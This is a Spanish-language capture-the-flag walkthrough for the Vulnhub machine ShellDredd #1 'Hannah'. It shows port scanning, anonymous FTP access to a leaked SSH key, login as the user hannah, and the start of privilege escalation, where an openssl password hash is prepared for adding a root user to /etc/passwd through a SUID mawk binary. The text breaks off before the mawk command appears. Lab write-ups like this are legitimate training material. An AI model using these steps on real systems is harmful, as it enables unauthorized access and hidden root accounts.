Hoy vamos a hackear la maquina de Vulnhub llamada
Shelldreed #1 HANNAH. Podeis descargarla desde el siguiente enlace:
HANNAH
Video
Enumeration
Empezamos con un nmap para ver que puertos
tiene abiertos.
~ > nmap -A -p- 192.168.1.108
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-08 10:58 CEST
Nmap scan report for 192.168.1.108
Host is up (0.00035s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.59
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
61000/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:2d:21:0c:2f:af:9d:5a:7b:3e:a4:27:aa:37:89:08 (RSA)
| 256 59:26:da:44:3b:97:d2:30:b1:9b:9b:02:74:8b:87:58 (ECDSA)
|_ 256 8e:ad:10:4f:e3:3e:65:28:40:cb:5b:bf:1d:24:7f:17 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds
Despues de escanear los puertos vemos que solo tiene el servicio
FTP y el SSH.
Nos conectamos al FTP usando anonymous/anonymous para ver que encontramos...
~ > ftp 192.168.1.108
Connected to 192.168.1.108.
220 (vsFTPd 3.0.3)
Name (192.168.1.108:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 0 115 4096 Aug 06 16:56 .
drwxr-xr-x 3 0 115 4096 Aug 06 16:56 ..
drwxr-xr-x 2 0 0 4096 Aug 06 16:54 .hannah
226 Directory send OK.
ftp>
ftp> cd .hannah
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Aug 06 16:54 .
drwxr-xr-x 3 0 115 4096 Aug 06 16:56 ..
-rwxr-xr-x 1 0 0 1823 Aug 06 16:54 id_rsa
226 Directory send OK.
Vemos que dentro de .hannah hay un fichero id_rsa. Lo
descargamos.
ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (1823 bytes).
226 Transfer complete.
1823 bytes received in 0.00 secs (1.6495 MB/s)
Tiene pinta de ser una key ssh, asi que probamos a loguearnos
como hannah usando dicha key.
~ > chmod 600 id_rsa
~ > ssh hannah@192.168.1.108 -i id_rsa -p 61000
The authenticity of host '[192.168.1.108]:61000 ([192.168.1.108]:61000)' can't
be established.
ECDSA key fingerprint is SHA256:ceHZU8u3GwiQwVwrN4Ci830AmTvAmIUOlLjtVYcP2KM.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.1.108]:61000' (ECDSA) to the list of known
hosts.
Linux ShellDredd 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 5 09:20:42 2020 from 192.168.1.140
hannah@ShellDredd:~$
Estamos dentro :)
user.txt
hannah@ShellDredd:~$ ls
user.txt
hannah@ShellDredd:~$ cat user.txt
Gr3mMhbCpuwxCZorqDL3ILPn
Privilege Escalation
Exploramos el sistema para ver si vemos algun binario
SUID que pueda ayudarnos con la escalada de privilegios.
Vemos que esta "mawk" el cual podemos utilizar....
Vamos a crear un usuario en el fichero /etc/passwd con permisos
de root, con ayuda de mawk.
La password que usara nuestro usuario es "123", asi que preparamos
su hash para ponerlo en nuestro fichero.
~ > openssl passwd -1 -salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1
Una vez tenemos la password que queremos utilizar, utilizamos mawk
para agregar al fichero /etc/passwd una linea con el usuario que
tendra privilegios de root y que utilizaremos!